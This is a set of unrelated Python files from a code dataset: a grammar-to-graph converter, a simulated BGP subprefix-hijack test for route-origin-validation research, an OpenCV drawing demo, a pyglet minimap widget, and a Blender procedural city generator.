"sub_path": "pyTelegramBotAPI/webhook_whatsmyid.py", "file_name": "webhook_whatsmyid.py", "file_ext": "py", "file_size_in_byte": 5171, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "telebot.TeleBot", "line_number": 15, "usage_type": "call"}, {"api_name": "cherrypy.request", "line_number": 22, "usage_type": "attribute"}, {"api_name": "cherrypy.request", 
"line_number": 23, "usage_type": "attribute"}, {"api_name": "cherrypy.request", "line_number": 24, "usage_type": "attribute"}, {"api_name": "cherrypy.request", "line_number": 25, "usage_type": "attribute"}, {"api_name": "cherrypy.request.body.read", "line_number": 26, "usage_type": "call"}, {"api_name": "cherrypy.request", "line_number": 26, "usage_type": "attribute"}, {"api_name": "telebot.types.Update.de_json", "line_number": 28, "usage_type": "call"}, {"api_name": "telebot.types", "line_number": 28, "usage_type": "attribute"}, {"api_name": "cherrypy.HTTPError", "line_number": 35, "usage_type": "call"}, {"api_name": "cherrypy.expose", "line_number": 20, "usage_type": "attribute"}, {"api_name": "telebot.types.InlineQueryResultArticle", "line_number": 90, "usage_type": "call"}, {"api_name": "telebot.types", "line_number": 90, "usage_type": "name"}, {"api_name": "telebot.types.InputTextMessageContent", "line_number": 94, "usage_type": "call"}, {"api_name": "telebot.types", "line_number": 94, "usage_type": "name"}, {"api_name": "cherrypy.config.update", "line_number": 110, "usage_type": "call"}, {"api_name": "cherrypy.config", "line_number": 110, "usage_type": "attribute"}, {"api_name": "cherrypy.quickstart", "line_number": 115, "usage_type": "call"}]} +{"seq_id": "264302906", "text": "from .cfg_pb2 import *\nfrom google.protobuf.text_format import Parse\nfrom google.protobuf.json_format import MessageToJson, MessageToDict\nimport json\n\nwith open('scripts/cfg.json', 'r') as f:\n \n cfg: ContextFreeGrammar = ContextFreeGrammar()\n Parse(f.read(), cfg)\n # print(cfg)\n\n cfg_dict = MessageToDict(cfg)\n # print(cfg)\n\n\n nodes = []\n\n x_axis = 10\n\n y_axis_terminal = 100\n y_axis_normal = 0\n\n\n for node in cfg_dict['nodes']:\n # print(node)\n n_node = {}\n n_node['id'] = str(node['canonicalId'])\n x_loc = x_axis\n y_loc = y_axis_normal\n if 'possibleValues' in node:\n n_node['title'] = ' '.join(node['possibleValues'])\n else:\n n_node['title'] = node['name']\n # n_node['color'] = 'lightgreen'\n\n # if node['isTerminalNode']:\n # y_loc = y_axis_terminal\n\n # x_axis += 100\n\n n_node['x'] = x_loc\n n_node['y'] = y_loc\n # n_node['type'] = 'SKINNY_TYPE'\n nodes.append(n_node)\n\n edges = []\n edge_key = 0\n for edge in cfg_dict['productionRules']:\n for adj_node in edge['adjacentNodes']:\n n_edge = {}\n edge_key -= 1\n # n_edge['key'] = edge_key\n n_edge['source'] = str(edge['node1'])\n n_edge['target'] = str(adj_node)\n n_edge['type'] = \"EMPTY_EDGE_TYPE\"\n\n edges.append(n_edge)\n\n\n\n\n final_js = {\n 'nodes': nodes,\n 'edges': edges\n }\n\n \n\n\n\n with open('/Users/pranavsharma/br/side-tools/viz-fsa/src/graph.json', 'w') as f2:\n\n json.dump(final_js, f2)\n # f2.write(MessageToJson(cfg))\n\n\n \n", "sub_path": "scripts/parser.py", "file_name": "parser.py", "file_ext": "py", "file_size_in_byte": 1673, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "google.protobuf.text_format.Parse", "line_number": 9, "usage_type": "call"}, {"api_name": "google.protobuf.json_format.MessageToDict", "line_number": 12, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 73, "usage_type": "call"}]} +{"seq_id": "320457902", "text": "import pytest\n\nfrom lib_caida_collector import PeerLink, CustomerProviderLink as CPLink\n\nfrom ..utils import run_example, HijackLocalRib\n\nfrom ....enums import ASNs, Prefixes, Timestamps, ROAValidity, Relationships\nfrom ....simulator.attacks import SubprefixHijack\nfrom ....engine 
import LocalRib\nfrom ....engine.bgp_policy import BGPPolicy\nfrom ....engine.bgp_ribs_policy import BGPRIBSPolicy\nfrom ....announcement import Announcement\n\n@pytest.mark.parametrize(\"BasePolicyCls\", [BGPPolicy, BGPRIBSPolicy])\ndef test_hidden_hijack_bgp(BasePolicyCls):\n r\"\"\"Hidden hijack example with BGP\n Figure 1a in our ROV++ paper\n\n 1\n \\\n 2 - 3\n / \\\n 777 666\n \"\"\"\n\n\n # Graph data\n peers = [PeerLink(2, 3)]\n customer_providers = [CPLink(provider_asn=1, customer_asn=2),\n CPLink(provider_asn=2, customer_asn=ASNs.VICTIM.value),\n CPLink(provider_asn=3, customer_asn=ASNs.ATTACKER.value)]\n # Number identifying the type of AS class\n as_policies = {asn: BasePolicyCls for asn in\n list(range(1, 4)) + [ASNs.VICTIM.value, ASNs.ATTACKER.value]}\n\n vic_kwargs = {\"prefix\": Prefixes.PREFIX.value,\n \"timestamp\": Timestamps.VICTIM.value,\n \"seed_asn\": None,\n \"roa_validity\": ROAValidity.VALID}\n atk_kwargs = {\"prefix\": Prefixes.SUBPREFIX.value,\n \"timestamp\": Timestamps.ATTACKER.value,\n \"seed_asn\": None,\n \"roa_validity\": ROAValidity.VALID}\n\n\n\n # Local RIB data\n local_ribs = {\n 1: LocalRib({Prefixes.PREFIX.value: Announcement(as_path=(1, 2, ASNs.VICTIM.value),\n recv_relationship=Relationships.CUSTOMERS,\n **vic_kwargs)}),\n 2: LocalRib({Prefixes.PREFIX.value: Announcement(as_path=(2, ASNs.VICTIM.value),\n recv_relationship=Relationships.CUSTOMERS,\n **vic_kwargs),\n Prefixes.SUBPREFIX.value: Announcement(as_path=(2, 3, ASNs.ATTACKER.value),\n recv_relationship=Relationships.PEERS,\n **atk_kwargs)}),\n 3: LocalRib({Prefixes.PREFIX.value: Announcement(as_path=(3, 2, ASNs.VICTIM.value),\n recv_relationship=Relationships.PEERS,\n **vic_kwargs),\n Prefixes.SUBPREFIX.value: Announcement(as_path=(3, ASNs.ATTACKER.value),\n recv_relationship=Relationships.CUSTOMERS,\n **atk_kwargs)}),\n ASNs.VICTIM.value:\n LocalRib({Prefixes.PREFIX.value: Announcement(as_path=(ASNs.VICTIM.value,),\n recv_relationship=Relationships.ORIGIN,\n **vic_kwargs),\n Prefixes.SUBPREFIX.value: Announcement(as_path=(ASNs.VICTIM.value,\n 2,\n 3,\n ASNs.ATTACKER.value),\n recv_relationship=Relationships.CUSTOMERS,\n **atk_kwargs)}),\n ASNs.ATTACKER.value:\n LocalRib({Prefixes.PREFIX.value: Announcement(as_path=(ASNs.ATTACKER.value,3, 2, ASNs.VICTIM.value),\n recv_relationship=Relationships.PROVIDERS,\n **vic_kwargs),\n Prefixes.SUBPREFIX.value: Announcement(as_path=(ASNs.ATTACKER.value,),\n recv_relationship=Relationships.ORIGIN,\n **atk_kwargs)}),\n }\n\n run_example(peers=peers,\n customer_providers=customer_providers,\n as_policies=as_policies,\n announcements=SubprefixHijack().announcements,\n local_ribs=local_ribs)\n", "sub_path": "lib_checkbook/tests/system_tests/bgp/test_hidden_hijack_bgp.py", "file_name": "test_hidden_hijack_bgp.py", "file_ext": "py", "file_size_in_byte": 4508, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "lib_caida_collector.PeerLink", "line_number": 28, "usage_type": "call"}, {"api_name": "lib_caida_collector.CustomerProviderLink", "line_number": 29, "usage_type": "call"}, {"api_name": "lib_caida_collector.CustomerProviderLink", "line_number": 30, "usage_type": "call"}, {"api_name": "enums.ASNs.VICTIM", "line_number": 30, "usage_type": "attribute"}, {"api_name": "enums.ASNs", "line_number": 30, "usage_type": "name"}, {"api_name": "lib_caida_collector.CustomerProviderLink", "line_number": 31, "usage_type": "call"}, {"api_name": "enums.ASNs.ATTACKER", "line_number": 31, "usage_type": 
"attribute"}, {"api_name": "enums.ASNs", "line_number": 31, "usage_type": "name"}, {"api_name": "enums.ASNs.VICTIM", "line_number": 34, "usage_type": "attribute"}, {"api_name": "enums.ASNs", "line_number": 34, "usage_type": "name"}, {"api_name": "enums.ASNs.ATTACKER", "line_number": 34, "usage_type": "attribute"}, {"api_name": "enums.Prefixes.PREFIX", "line_number": 36, "usage_type": "attribute"}, {"api_name": "enums.Prefixes", "line_number": 36, "usage_type": "name"}, {"api_name": "enums.Timestamps.VICTIM", "line_number": 37, "usage_type": "attribute"}, {"api_name": "enums.Timestamps", "line_number": 37, "usage_type": "name"}, {"api_name": "enums.ROAValidity.VALID", "line_number": 39, "usage_type": "attribute"}, {"api_name": "enums.ROAValidity", "line_number": 39, "usage_type": "name"}, {"api_name": "enums.Prefixes.SUBPREFIX", "line_number": 40, "usage_type": "attribute"}, {"api_name": "enums.Prefixes", "line_number": 40, "usage_type": "name"}, {"api_name": "enums.Timestamps.ATTACKER", "line_number": 41, "usage_type": "attribute"}, {"api_name": "enums.Timestamps", "line_number": 41, "usage_type": "name"}, {"api_name": "enums.ROAValidity.VALID", "line_number": 43, "usage_type": "attribute"}, {"api_name": "enums.ROAValidity", "line_number": 43, "usage_type": "name"}, {"api_name": "enums.ASNs.VICTIM", "line_number": 64, "usage_type": "attribute"}, {"api_name": "enums.ASNs", "line_number": 64, "usage_type": "name"}, {"api_name": "enums.ASNs.ATTACKER", "line_number": 74, "usage_type": "attribute"}, {"api_name": "enums.ASNs", "line_number": 74, "usage_type": "name"}, {"api_name": "engine.LocalRib", "line_number": 49, "usage_type": "call"}, {"api_name": "enums.Prefixes.PREFIX", "line_number": 49, "usage_type": "attribute"}, {"api_name": "enums.Prefixes", "line_number": 49, "usage_type": "name"}, {"api_name": "announcement.Announcement", "line_number": 49, "usage_type": "call"}, {"api_name": "enums.ASNs.VICTIM", "line_number": 49, "usage_type": "attribute"}, {"api_name": "enums.ASNs", "line_number": 49, "usage_type": "name"}, {"api_name": "enums.Relationships.CUSTOMERS", "line_number": 50, "usage_type": "attribute"}, {"api_name": "enums.Relationships", "line_number": 50, "usage_type": "name"}, {"api_name": "engine.LocalRib", "line_number": 52, "usage_type": "call"}, {"api_name": "enums.Prefixes.PREFIX", "line_number": 52, "usage_type": "attribute"}, {"api_name": "enums.Prefixes", "line_number": 52, "usage_type": "name"}, {"api_name": "enums.Prefixes.SUBPREFIX", "line_number": 55, "usage_type": "attribute"}, {"api_name": "enums.Prefixes", "line_number": 55, "usage_type": "name"}, {"api_name": "announcement.Announcement", "line_number": 52, "usage_type": "call"}, {"api_name": "enums.ASNs.VICTIM", "line_number": 52, "usage_type": "attribute"}, {"api_name": "enums.ASNs", "line_number": 52, "usage_type": "name"}, {"api_name": "enums.Relationships.CUSTOMERS", "line_number": 53, "usage_type": "attribute"}, {"api_name": "enums.Relationships", "line_number": 53, "usage_type": "name"}, {"api_name": "announcement.Announcement", "line_number": 55, "usage_type": "call"}, {"api_name": "enums.ASNs.ATTACKER", "line_number": 55, "usage_type": "attribute"}, {"api_name": "enums.ASNs", "line_number": 55, "usage_type": "name"}, {"api_name": "enums.Relationships.PEERS", "line_number": 56, "usage_type": "attribute"}, {"api_name": "enums.Relationships", "line_number": 56, "usage_type": "name"}, {"api_name": "engine.LocalRib", "line_number": 58, "usage_type": "call"}, {"api_name": "enums.Prefixes.PREFIX", "line_number": 
58, "usage_type": "attribute"}, {"api_name": "enums.Prefixes", "line_number": 58, "usage_type": "name"}, {"api_name": "enums.Prefixes.SUBPREFIX", "line_number": 61, "usage_type": "attribute"}, {"api_name": "enums.Prefixes", "line_number": 61, "usage_type": "name"}, {"api_name": "announcement.Announcement", "line_number": 58, "usage_type": "call"}, {"api_name": "enums.ASNs.VICTIM", "line_number": 58, "usage_type": "attribute"}, {"api_name": "enums.ASNs", "line_number": 58, "usage_type": "name"}, {"api_name": "enums.Relationships.PEERS", "line_number": 59, "usage_type": "attribute"}, {"api_name": "enums.Relationships", "line_number": 59, "usage_type": "name"}, {"api_name": "announcement.Announcement", "line_number": 61, "usage_type": "call"}, {"api_name": "enums.ASNs.ATTACKER", "line_number": 61, "usage_type": "attribute"}, {"api_name": "enums.ASNs", "line_number": 61, "usage_type": "name"}, {"api_name": "enums.Relationships.CUSTOMERS", "line_number": 62, "usage_type": "attribute"}, {"api_name": "enums.Relationships", "line_number": 62, "usage_type": "name"}, {"api_name": "engine.LocalRib", "line_number": 65, "usage_type": "call"}, {"api_name": "enums.Prefixes.PREFIX", "line_number": 65, "usage_type": "attribute"}, {"api_name": "enums.Prefixes", "line_number": 65, "usage_type": "name"}, {"api_name": "enums.Prefixes.SUBPREFIX", "line_number": 68, "usage_type": "attribute"}, {"api_name": "enums.Prefixes", "line_number": 68, "usage_type": "name"}, {"api_name": "announcement.Announcement", "line_number": 65, "usage_type": "call"}, {"api_name": "enums.ASNs.VICTIM", "line_number": 65, "usage_type": "attribute"}, {"api_name": "enums.ASNs", "line_number": 65, "usage_type": "name"}, {"api_name": "enums.Relationships.ORIGIN", "line_number": 66, "usage_type": "attribute"}, {"api_name": "enums.Relationships", "line_number": 66, "usage_type": "name"}, {"api_name": "announcement.Announcement", "line_number": 68, "usage_type": "call"}, {"api_name": "enums.ASNs.VICTIM", "line_number": 68, "usage_type": "attribute"}, {"api_name": "enums.ASNs", "line_number": 68, "usage_type": "name"}, {"api_name": "enums.ASNs.ATTACKER", "line_number": 71, "usage_type": "attribute"}, {"api_name": "enums.ASNs", "line_number": 71, "usage_type": "name"}, {"api_name": "enums.Relationships.CUSTOMERS", "line_number": 72, "usage_type": "attribute"}, {"api_name": "enums.Relationships", "line_number": 72, "usage_type": "name"}, {"api_name": "engine.LocalRib", "line_number": 75, "usage_type": "call"}, {"api_name": "enums.Prefixes.PREFIX", "line_number": 75, "usage_type": "attribute"}, {"api_name": "enums.Prefixes", "line_number": 75, "usage_type": "name"}, {"api_name": "enums.Prefixes.SUBPREFIX", "line_number": 78, "usage_type": "attribute"}, {"api_name": "enums.Prefixes", "line_number": 78, "usage_type": "name"}, {"api_name": "announcement.Announcement", "line_number": 75, "usage_type": "call"}, {"api_name": "enums.ASNs.ATTACKER", "line_number": 75, "usage_type": "attribute"}, {"api_name": "enums.ASNs", "line_number": 75, "usage_type": "name"}, {"api_name": "enums.ASNs.VICTIM", "line_number": 75, "usage_type": "attribute"}, {"api_name": "enums.Relationships.PROVIDERS", "line_number": 76, "usage_type": "attribute"}, {"api_name": "enums.Relationships", "line_number": 76, "usage_type": "name"}, {"api_name": "announcement.Announcement", "line_number": 78, "usage_type": "call"}, {"api_name": "enums.ASNs.ATTACKER", "line_number": 78, "usage_type": "attribute"}, {"api_name": "enums.ASNs", "line_number": 78, "usage_type": "name"}, 
{"api_name": "enums.Relationships.ORIGIN", "line_number": 79, "usage_type": "attribute"}, {"api_name": "enums.Relationships", "line_number": 79, "usage_type": "name"}, {"api_name": "utils.run_example", "line_number": 83, "usage_type": "call"}, {"api_name": "simulator.attacks.SubprefixHijack", "line_number": 86, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 14, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 14, "usage_type": "attribute"}, {"api_name": "engine.bgp_policy.BGPPolicy", "line_number": 14, "usage_type": "name"}, {"api_name": "engine.bgp_ribs_policy.BGPRIBSPolicy", "line_number": 14, "usage_type": "name"}]} +{"seq_id": "349225895", "text": "import numpy as np\nimport cv2\n\nimg = cv2.imread('C:\\\\Users\\\\Aman Deep Singh\\\\Downloads\\\\Images\\\\github.jpg', cv2.IMREAD_COLOR)\n\n# Drawing using CV2 will be optimal compared to using matplotlib to do so\n# arguments (where, (x0, y0), (x1, y1), (color in BGR), linewidth)\ncv2.line(img, (0, 0), (150, 150), (200, 100, 50), 15)\n# arguments (where, (top left point), (bottom right point), (color), linewidth)\ncv2.rectangle(img, (15, 25), (200, 150), (150, 100, 200), 5)\n# arguments (where, (center.x, center.y), radius, (color, -1: fill))\ncv2.circle(img, (100, 64), 55, (0, 0, 0), -1)\n\n# Polygon\npoints = np.array([[10, 5], [20, 30], [70, 20], [50, 10]], np.int32)\n# OpenCV suggests reshaping the array\npoints = points.reshape((-1, 1, 2))\n# True: whether or not we want to connect the first point to the last\ncv2.polylines(img, [points], True, (0, 255, 255), 3)\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\n# font: uses the font specified above, 1: size, 2: line thickness, AA: anti-aliasing\ncv2.putText(img, 'OpenCV', (0, 130), font, 1, (200, 255, 255), 2, cv2.LINE_AA)\ncv2.imshow('Github', img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()", "sub_path": "opencv_draw.py", "file_name": "opencv_draw.py", "file_ext": "py", "file_size_in_byte": 1117, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "cv2.imread", "line_number": 4, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 4, "usage_type": "attribute"}, {"api_name": "cv2.line", "line_number": 8, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 15, "usage_type": "attribute"}, {"api_name": "cv2.polylines", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 21, "usage_type": "attribute"}, {"api_name": "cv2.putText", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.LINE_AA", "line_number": 23, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 24, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 25, "usage_type": "call"}, {"api_name": "cv2.destroyAllWindows", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "224233725", "text": "\nimport widgets\nfrom pyglet import event\nfrom pyglet import gl\nfrom pyglet import graphics\nfrom pyglet.window import mouse\n\n# FIXME look into rendering minimap as a texture\n\nclass MinimapPoints(object):\n\n def __init__(self, bg_color, x, y, width, height, scale=2):\n self._cs = dict()\n self._batch = graphics.Batch()\n self._height = height\n self.scale = scale\n self._scale2 = scale ** 2\n npnts = 
self._scale2 * width * height\n\n _get_xy = lambda u, v: \\\n (p for xy in ((scale*u+x+dx, scale*v+y+dy) for dx in xrange(scale) for dy in xrange(scale)) for p in xy)\n xy = (_get_xy(u, v) for u in xrange(width) for v in xrange(height))\n xy = [p for xy_ in xy for p in xy_] # flatten\n\n self._vl = self._batch.add(npnts, gl.GL_POINTS, None, ('v2i', xy),\n ('c4f', bg_color*(npnts)))\n self._nvertices = 1\n self._added = set()\n\n def set_color(self, u, v, c):\n i = 4 * self._scale2 * (self._height * u + v)\n if i not in self._added:\n self._vl.colors[i:i+4*self._scale2] = c * self._scale2\n self._added.add(i)\n\n def draw(self):\n self._batch.draw()\n\n\nclass MiniMap(widgets.Widget):\n\n def __init__(self, tilemap, player_color=(0, 0, 1), scale=2, alpha=1.0, *args, **kwargs):\n super(MiniMap, self).__init__(*args, **kwargs)\n self.tilemap = tilemap\n self.player_color = \\\n (player_color[0], player_color[1], player_color[2], alpha)\n self.width = scale * self.tilemap.width\n self.height = scale * self.tilemap.height\n self.scale = scale\n self.alpha = alpha\n self._pnts = None\n\n def show_at(self, x, y):\n super(MiniMap, self).show_at(x, y)\n if not self._pnts:\n self._pnts = MinimapPoints((0.2, 0.2, 0.3, self.alpha), self.x, self.y, self.tilemap.width,\n self.tilemap.height, self.scale)\n\n def draw_ui(self):\n gl.glColor4f(1, 1, 1, self.alpha)\n x0, y0, x1, y1 = self.x - 1, self.y - 1, \\\n self.x + self.width + 1, self.y + self.height + 1\n graphics.draw(4, gl.GL_LINE_LOOP, ('v2i', (x0, y1, x1, y1, x1, y0, x0, y0))) # FIXME graphics.draw is slow\n\n # FIXME this loop may be a performace hit - alternative is to hook in to\n # TileMap.set_explored, and not update _pnts in draw_ui\n for t in self.tilemap.explored_tiles:\n x = t.x // self.tilemap.dx\n y = t.y // self.tilemap.dy\n c = list(t.minimap_color)\n c.append(self.alpha)\n self._pnts.set_color(x, y, c)\n\n self._pnts.draw()\n\n gl.glColor4f(*self.player_color)\n punits = self.tilemap.units['PlayerUnit']\n ps = list()\n for p in punits:\n x = self.scale * p.x // self.tilemap.dx + self.x\n y = self.scale * p.y // self.tilemap.dy + self.y\n ps.extend([c for xy in ((x+dx, y+dy) for dx in xrange(self.scale)\n for dy in xrange(self.scale)) for c in xy])\n graphics.draw(len(ps)//2, gl.GL_POINTS, ('v2i', ps)) # FIXME graphics.draw is slow\n\n gl.glColor4f(1, 1, 1, self.alpha)\n p = self.tilemap.selected_tile\n x = self.scale * p.x // self.tilemap.dx + self.x\n y = self.scale * p.y // self.tilemap.dy + self.y\n ps = [c for xy in ((x+dx, y+dy) for dx in xrange(self.scale) for dy in\n xrange(self.scale)) for c in xy]\n graphics.draw(len(ps)//2, gl.GL_POINTS, ('v2i', ps)) # FIXME graphics.draw is slow\n\n gl.glColor4f(1, 0, 0, self.alpha)\n x = self.x + self.scale * self.tilemap.window.x // self.tilemap.window.dx\n y = self.y + self.scale * self.tilemap.window.y // self.tilemap.window.dy\n width = self.scale * self.tilemap.window.width // self.tilemap.window.dx\n height = self.scale * self.tilemap.window.height // self.tilemap.window.dx\n x0, y0, x1, y1 = x - 1, y - 1, x + width + 1, y + height + 1\n graphics.draw(4, gl.GL_LINE_LOOP, ('v2i', (x0, y1, x1, y1, x1, y0, x0, y0))) # FIXME graphics.draw is slow\n\n # FIXME make drag\n def on_mouse_press(self, x, y, button, modifiers):\n if button == mouse.LEFT and modifiers == 0:\n if (self.x <= x <= self.x+self.width) and \\\n (self.y <= y <= self.y+self.height):\n u = (x - self.x) // self.scale\n v = (y - self.y) // self.scale\n self.tilemap.center_on(u, v)\n return event.EVENT_HANDLED\n if button 
== mouse.RIGHT and modifiers == 0:\n if (self.x <= x <= self.x+self.width) and \\\n (self.y <= y <= self.y+self.height):\n u = (x - self.x) // self.scale\n v = (y - self.y) // self.scale\n self.tilemap.move_tile(u, v)\n return event.EVENT_HANDLED\n\n\n\n", "sub_path": "src/minimap.py", "file_name": "minimap.py", "file_ext": "py", "file_size_in_byte": 4874, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pyglet.graphics.Batch", "line_number": 14, "usage_type": "call"}, {"api_name": "pyglet.graphics", "line_number": 14, "usage_type": "name"}, {"api_name": "pyglet.gl.GL_POINTS", "line_number": 25, "usage_type": "attribute"}, {"api_name": "pyglet.gl", "line_number": 25, "usage_type": "name"}, {"api_name": "widgets.Widget", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pyglet.gl.glColor4f", "line_number": 60, "usage_type": "call"}, {"api_name": "pyglet.gl", "line_number": 60, "usage_type": "name"}, {"api_name": "pyglet.graphics.draw", "line_number": 63, "usage_type": "call"}, {"api_name": "pyglet.graphics", "line_number": 63, "usage_type": "name"}, {"api_name": "pyglet.gl.GL_LINE_LOOP", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pyglet.gl", "line_number": 63, "usage_type": "name"}, {"api_name": "pyglet.gl.glColor4f", "line_number": 76, "usage_type": "call"}, {"api_name": "pyglet.gl", "line_number": 76, "usage_type": "name"}, {"api_name": "pyglet.graphics.draw", "line_number": 84, "usage_type": "call"}, {"api_name": "pyglet.graphics", "line_number": 84, "usage_type": "name"}, {"api_name": "pyglet.gl.GL_POINTS", "line_number": 84, "usage_type": "attribute"}, {"api_name": "pyglet.gl", "line_number": 84, "usage_type": "name"}, {"api_name": "pyglet.gl.glColor4f", "line_number": 86, "usage_type": "call"}, {"api_name": "pyglet.gl", "line_number": 86, "usage_type": "name"}, {"api_name": "pyglet.graphics.draw", "line_number": 92, "usage_type": "call"}, {"api_name": "pyglet.graphics", "line_number": 92, "usage_type": "name"}, {"api_name": "pyglet.gl.GL_POINTS", "line_number": 92, "usage_type": "attribute"}, {"api_name": "pyglet.gl", "line_number": 92, "usage_type": "name"}, {"api_name": "pyglet.gl.glColor4f", "line_number": 94, "usage_type": "call"}, {"api_name": "pyglet.gl", "line_number": 94, "usage_type": "name"}, {"api_name": "pyglet.graphics.draw", "line_number": 100, "usage_type": "call"}, {"api_name": "pyglet.graphics", "line_number": 100, "usage_type": "name"}, {"api_name": "pyglet.gl.GL_LINE_LOOP", "line_number": 100, "usage_type": "attribute"}, {"api_name": "pyglet.gl", "line_number": 100, "usage_type": "name"}, {"api_name": "pyglet.window.mouse.LEFT", "line_number": 104, "usage_type": "attribute"}, {"api_name": "pyglet.window.mouse", "line_number": 104, "usage_type": "name"}, {"api_name": "pyglet.event.EVENT_HANDLED", "line_number": 110, "usage_type": "attribute"}, {"api_name": "pyglet.event", "line_number": 110, "usage_type": "name"}, {"api_name": "pyglet.window.mouse.RIGHT", "line_number": 111, "usage_type": "attribute"}, {"api_name": "pyglet.window.mouse", "line_number": 111, "usage_type": "name"}, {"api_name": "pyglet.event.EVENT_HANDLED", "line_number": 117, "usage_type": "attribute"}, {"api_name": "pyglet.event", "line_number": 117, "usage_type": "name"}]} +{"seq_id": "245655827", "text": "import sys, os\nsys.path.append('.')\nfrom primaryStreets import PrimaryStreets\nfrom secundaryStreets import SecundaryStreets\nfrom sidewalk import Sidewalk\nfrom subdivision import 
Subdivision\nfrom building import Building\nfrom greenZone import GreenZone\nfrom random import randint, uniform\nfrom mathutils import Vector\nfrom auxiliarFunctions import *\n\ngrammars=[\"building1.grammar\",\"building2.grammar\"] #Grammars to the buildings\n\n\n\n#===========TO TRY JUST A BUILDING==========#\ncurrent_directory = './libraries'\nsys.path.append((current_directory))\nfrom lsystem import Grammar\nfrom ProceduralGeometry import Designer, Geometry\nimport bpy, bmesh\n#==========================================#\n\ndef lookAt(camera, pos):\n direction = pos-camera.location\n rot_quat = direction.to_track_quat('-Z', 'Y')\n camera.rotation_euler = rot_quat.to_euler()\n\n#Generation of a city in real-time\n#Stages:\n# 1 - Creating the primary streets\n# 2 - Creating the secundary streets\n# 3 - Subdivision of the neighborhoods\n# 4 - Creating the buildings\n# 5 - Texturing\n#\n#Parameters:\n# - x: x size between where the city will be (from -x to x on the X axis)\n# - y: y size between where the city will be (from -y to y on the Y axis)\n# - primaryprimaryStreetSize: size of the primary streets\n# - secundaryStreetSize: size of the secondary streets\n# - districtHeight(just Voronoi Algorithm): height of the district\n# - districtWidth(just Voronoi Algorithm): width of the district\n# - neighborhoodHeight: height of the neighborhood where the buildings will be placed\n# - neighborhoodWidth: width of the neighborhood where the buildings will be placed\n# - maxAreaBuilding: maximum area to the floor of a building\n# - minAreaBuilding: minimum area to the floor of a building\n# - densityFactor(just Random Streets Algorithm): factor of density to the primary streets (more densityFactor increase the density) \ndef city(x,y,primaryStreetSize,secundaryStreetSize,districtHeihgt,districtWidth,neighborhoodHeight,neighborhoodWidth,maxAreaBuilding,minAreaBuilding,densityFactor,greenZone,UVtexturing):\n \n #Stage 1: primary streets and adding material and texture\n p = PrimaryStreets(x,y,primaryStreetSize,densityFactor,districtHeihgt,districtWidth)\n p.material()\n \n #Stage 2: secundary streets and adding material and texture\n s = SecundaryStreets(x,y,p.district,secundaryStreetSize,neighborhoodHeight,neighborhoodWidth)\n s.material()\n \n #Stage 3: subdivision of neighborhoods, one by one\n for n in s.neighborhoods:\n percentageZoneWithoutBuidings = greenZone\n randomPercentage = uniform(0.0,1.0) \n \n #Making sidewalks and adding material and texture\n sidewalk = Sidewalk(n)\n if UVtexturing == 1:\n sidewalk.material2()\n else:\n sidewalk.material()\n \n if randomPercentage <= percentageZoneWithoutBuidings:\n g = GreenZone(sidewalk.face)\n g.material()\n else: \n #Subdivision to make the floor of the buildings\n n = Subdivision(sidewalk.face, maxAreaBuilding, minAreaBuilding)\n \n maxDistance = dist([0,0,0],[x,y,0])/4 #Distance from the center (0,0,0) where the buildings will be taller\n \n #Create a building in each floor and adding material and texture\n for i in n.faces:\n if len(i) != 3: \n buildingVertices = []\n for j in i:\n buildingVertices.append(n.vertices[j])\n \n #Check if the building is in the center of the city\n centerLocalization = 0\n for j in buildingVertices:\n if dist([0,0,0],j) < maxDistance:\n centerLocalization += 1\n else:\n break\n \n if centerLocalization == len(buildingVertices):\n b = Building(grammars[1],randint(2,10),buildingVertices)\n if UVtexturing == 1:\n b.material2(randint(0,5))\n else:\n b.material(randint(0,5))\n #b.material(randint(0,1))\n else:\n b 
= Building(grammars[0],2,buildingVertices)\n if UVtexturing == 1:\n b.material2(0)\n else:\n b.material(0)\n \n #Light for the scene \n sun=bpy.ops.object.lamp_add(type='SUN', view_align=False, location=(50, 50, 200), rotation=(0,0,0)) \n sun=bpy.data.objects[\"Sun\"]\n sun.data.energy=4\n\n lookAt(sun,(Vector((0,0,0))))\n \n \n \n \n#==========================JUST TO TRY A BUILDING===============================\n\n #==============================================================================\n # vertices = [[-1.35524,2.00595,0.1],\n # [-1.35524,-2.0371,0.1],\n # [1.17439,-2.0371,0.1],\n # [1.56847,1.25557,0.1],\n # [0.92263,2.00595,0.1]]\n # \n # auxVertices = []\n # center = centroid_of_polygon(vertices)\n # center.append(0)\n # for v in vertices:\n # auxVertices.append([v[0]-center[0],v[1]-center[1],v[2]-center[2]])\n # \n # d = Designer(auxVertices)\n # \n # d.generateGeometry('EEP')\n # mesh=bpy.data.meshes.new(\"l-system mesh\")\n # object=bpy.data.objects.new(\"l-system object\",mesh)\n # object.location= center\n # bpy.context.scene.objects.link(object)\n # mesh.from_pydata(d.vertices,[],d.faces)\n # mesh.update(calc_edges=True)\n #==============================================================================\n\n#=============================================================================== \n \nxDimension = None\nyDimension = None\nprimaryStreetSize = None\nsecondaryStreetSize = None\ndistrictHeihgt = None\ndistrictWidth = None\nneighborhoodHeight = None\nneighborhoodWidth = 